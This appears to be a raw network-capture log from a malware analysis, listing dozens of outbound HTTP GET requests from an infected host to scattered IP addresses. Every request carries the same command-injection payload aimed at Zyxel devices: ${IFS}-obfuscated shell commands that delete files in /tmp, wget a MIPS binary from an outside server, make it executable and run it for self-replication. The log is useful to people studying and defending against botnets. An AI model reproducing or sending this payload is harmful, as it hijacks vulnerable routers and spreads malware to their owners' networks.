                                            Jan 14, 2024 15:50:37.372282028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3576192.168.2.236030035.68.81.227443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.372282028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3577192.168.2.2357888122.19.150.78443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.372324944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3578192.168.2.235840854.55.58.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.372390985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3579192.168.2.234644012.164.201.162443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.372416019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3580192.168.2.235206457.109.246.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.372422934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3581192.168.2.234571667.38.117.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.372425079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3582192.168.2.233363679.234.111.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.372482061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3583192.168.2.2342820129.187.38.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.372482061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3584192.168.2.2355386213.244.252.36443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.372505903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3585192.168.2.23368242.253.242.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.372558117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3586192.168.2.2352604105.66.77.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.372569084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3587192.168.2.234233267.227.94.127443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.372584105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3588192.168.2.2349150150.37.198.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.372584105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3589192.168.2.2356834172.78.226.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.372601986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3590192.168.2.2357072102.50.250.35443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.372649908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3591192.168.2.2332968203.172.81.37443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.372682095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3592192.168.2.2342016189.233.111.78443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.372688055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3593192.168.2.235992646.191.178.213443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.372714996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3594192.168.2.2336180138.191.60.84443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.372759104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3595192.168.2.235670046.194.55.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.372823954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3596192.168.2.2334818116.53.108.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.372843027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3597192.168.2.234191280.113.1.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.372879028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3598192.168.2.233949461.182.105.245443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.372911930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3599192.168.2.235628841.44.245.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.372951031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3600192.168.2.233379235.216.178.6443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.372977018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3601192.168.2.2337328136.75.68.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373013973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3602192.168.2.2338274201.133.206.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373022079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3603192.168.2.2338048206.71.192.212443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373076916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3604192.168.2.2345670128.127.176.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373092890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3605192.168.2.2351086185.123.167.148443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373102903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3606192.168.2.2351842107.93.56.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373121023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3607192.168.2.2352920153.120.73.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373177052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3608192.168.2.234815663.119.19.61443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373195887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3609192.168.2.23389722.46.252.161443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373222113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3610192.168.2.235191859.100.8.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373243093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3611192.168.2.2352120143.95.91.208443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373277903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3612192.168.2.233417277.186.149.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373311043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3613192.168.2.2352944154.163.39.184443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373333931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3614192.168.2.2356332134.88.157.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373347044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3615192.168.2.2345346143.170.97.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373368979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3616192.168.2.2345006155.11.111.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373430967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3617192.168.2.23443164.213.60.172443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373449087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3618192.168.2.2336814181.65.214.245443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373487949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3619192.168.2.2351350203.196.174.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373523951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3620192.168.2.2347986155.81.122.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373533964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3621192.168.2.2350250166.78.212.159443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373583078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3622192.168.2.2345094220.43.200.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373605013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3623192.168.2.236083483.172.131.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373631954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3624192.168.2.234295274.108.112.65443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373655081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3625192.168.2.235407638.85.136.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373684883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3626192.168.2.234133838.199.202.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373706102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3627192.168.2.2344928136.215.146.155443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373732090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3628192.168.2.2354276198.174.40.103443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373758078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3629192.168.2.2335064198.189.97.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373790026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3630192.168.2.235564689.208.158.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373836994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3631192.168.2.2337170144.182.49.122443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373857021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3632192.168.2.2351532137.41.253.178443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373914957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3633192.168.2.2344148194.17.173.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373918056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3634192.168.2.233430498.32.79.57443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373955965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3635192.168.2.233500668.210.45.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373969078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3636192.168.2.23427304.29.144.83443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.373969078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3637192.168.2.2351758178.35.177.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:37.374006987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3638192.168.2.234571691.129.189.249443
                                            TimestampBytes transferredDirectionData
